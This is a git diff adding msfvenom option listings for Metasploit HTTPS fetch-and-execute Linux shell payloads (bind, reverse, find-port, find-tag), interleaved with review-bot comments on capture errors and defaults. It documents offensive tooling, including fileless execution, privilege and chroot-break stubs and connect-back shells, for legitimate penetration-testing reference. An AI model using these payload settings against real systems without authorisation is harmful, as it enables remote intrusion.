Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_ipv6_tcp.txt new file mode 100644 index 0000000..ac8696b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_ipv6_tcp.txt 
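Review bot: the header block of cmd-linux-https-x86-shell-reverse_tcp_uuid.txt is corrupted between `Needs Admin: No` and `Basic options:`: `Total si` is cut off, an empty `Evasion options for payload/cmd/linux/https/x86/shell/reverse_tcp_uuid:` block with its `=====` underline has been spliced in where `Total size:`, `Rank:` and `Provided by:` belong, and the author list survives only as the fragment `r@hick.org>` followed by `egypt` and `OJ Reeves`. Every sibling file in this commit has an intact `Total size` / `Rank` / `Provided by` block, so this is an interleaved-output capture, not a real difference in the module. Regenerate this one file from a fresh `msfvenom -p cmd/linux/https/x86/shell/reverse_tcp_uuid --list-options` run (the flag is documented in help.txt), keeping stdout and stderr separate, and re-check the `+1,104` count in the hunk header against the regenerated file before committing.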
@@ -0,0 +1,85 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Inline (IPv6) + Module: payload/cmd/linux/https/x86/shell_bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME aJwFYAkIV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Listen for a connection over IPv6 and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own 
process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_tcp.txt new file mode 100644 index 0000000..651b1fd --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_tcp.txt 
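Review bot: `FETCH_FILENAME aJwFYAkIV` in cmd-linux-https-x86-shell_bind_ipv6_tcp.txt is a per-run random default; the siblings in this commit show PuAcJbYKt, ZaUEqHDzZSP and btKUNQDJWbxC for the same row, and `TAG vCwJ` further down is the same kind of value. Every regeneration of these snapshots will therefore produce a spurious one-line diff per file that hides any real option change. Either post-process the dumps to replace those values with a fixed placeholder, or state in the repository README that the `FETCH_FILENAME` and `TAG` defaults are whatever msfvenom generated on the capture run and are not meaningful.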
@@ -0,0 +1,85 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/https/x86/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZaUEqHDzZSP no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own 
process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_tcp_random_port.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_tcp_random_port.txt new file mode 100644 index 0000000..f7615dc --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_tcp_random_port.txt 
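Review bot: `AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root)` in cmd-linux-https-x86-shell_bind_tcp.txt carries the description of `PrependChrootBreak`, which appears a few rows lower with the identical text, and the same duplicated row is present in every file of this commit. The dump reproduces what msfvenom prints, so the snapshot itself is faithful, but anyone using these files as a reference for what `AppendExit` does will be misled. Add a one-line note in the commit message or README that the description string is wrong upstream, and report it against metasploit-framework rather than hand-editing the snapshot.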
@@ -0,0 +1,82 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Random Port Inline + Module: payload/cmd/linux/https/x86/shell_bind_tcp_random_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Geyslan G. Bem + Aleh Boitsau + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME btKUNQDJWbxC no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + + Listen for a connection in a random port and spawn a command shell. + Use nmap to discover the open port: 'nmap -sS target -p-'. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub 
that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell_find_port.txt new file mode 100644 index 0000000..51eaec3 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell_find_port.txt 
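Review bot: cmd-linux-https-x86-shell_bind_tcp_random_port.txt has no `AutoRunScript`, `AutoVerifySession`, `CommandShellCleanupCommand` or `InitialAutoRunScript` rows in the advanced list and no `LPORT` / `RHOST` rows in the basic list, unlike the other bind variants in this commit, which will make a reader suspect a truncated capture. It is not: the `+1,82` count in the hunk header against `+1,85` for cmd-linux-https-x86-shell_bind_tcp.txt is exactly those six missing rows offset by the two extra description lines and the fourth `Provided by` entry. Since the description itself tells the operator `Use nmap to discover the open port: 'nmap -sS target -p-'`, a README line saying that this payload exposes no listener-side session options (there is no fixed port to put a handler on) would spare readers the same double-check.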
@@ -0,0 +1,84 @@ + + Name: HTTPS Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/https/x86/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 39746 no The local client port +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME zSFopvMBg no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own 
process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell_find_tag.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell_find_tag.txt new file mode 100644 index 0000000..c894d47 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell_find_tag.txt 
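Review bot: the `FETCH_FILELESS` row in cmd-linux-https-x86-shell_find_port.txt, `requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)`, never closes its first parenthesis, so the kernel and interpreter constraints run into the accepted-values list; the same text is in every file here and comes from upstream, so leave the snapshot as captured. Because this is the row operators will read before choosing a fileless mode, restate it cleanly in the README: `none` writes the binary to `FETCH_WRITABLE_DIR`, `bash` needs a target kernel of 3.17 or later for the anonymous-handle trick, and `python3.8+` additionally needs Python 3.8 or later on the target. Also worth flagging in that README entry: `CPORT 39746` looks like a value captured on this run rather than a documented default, so it should not be copied as if it were fixed.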
@@ -0,0 +1,84 @@ + + Name: HTTPS Fetch, Linux Command Shell, Find Tag Inline + Module: payload/cmd/linux/https/x86/shell_find_tag + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME bQxLcpjD no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a shell on an established connection (proxy/NAT safe) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own 
process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + TAG vCwJ yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell_reverse_tcp.txt new file mode 100644 index 0000000..6994274 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell_reverse_tcp.txt 
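Review bot: the three rows `FETCH_CHECK_CERT false yes Check SSL certificate`, `FetchSSLCert no Path to a custom SSL certificate (default is randomly generated)` and `FetchSSLVersion Auto yes ... (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)` in cmd-linux-https-x86-shell_find_tag.txt together mean that the "HTTPS" in these module names gives no server authentication out of the box: the fetch command skips certificate checking, the served certificate is a fresh random one, and the listener will negotiate SSL3 or TLS 1.0 if asked. Turning `FETCH_CHECK_CERT` on only helps if `FetchSSLCert` points at a certificate the target already trusts, and `FetchSSLCipher` even lists `"ADH"` (anonymous DH) as an example. None of that is a capture problem, but a snapshot repository that people will grep for defaults should carry a short caveat next to these files so the `https` variants are not assumed to be stronger than the plain `http` ones against an interposing proxy.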
@@ -0,0 +1,94 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/https/x86/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD /bin/sh yes The command string to execute +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME SixWyJEAeMp no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template 
+ MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell_reverse_tcp_ipv6.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell_reverse_tcp_ipv6.txt new file mode 100644 index 0000000..7e2e00e --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell_reverse_tcp_ipv6.txt 
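Review bot: the `AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root)` row in the advanced-options table of this hunk carries the `PrependChrootBreak` description verbatim, so the dump publishes a wrong description for `AppendExit`; the string comes from the module metadata, so the correction belongs upstream, but the generated page should not reproduce it unflagged. The `FETCH_FILENAME SixWyJEAeMp` default is likewise a per-run random name (the IPv6 twin in the next hunk has a different one), and should be masked the same way as other randomised defaults to keep regenerated files stable.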
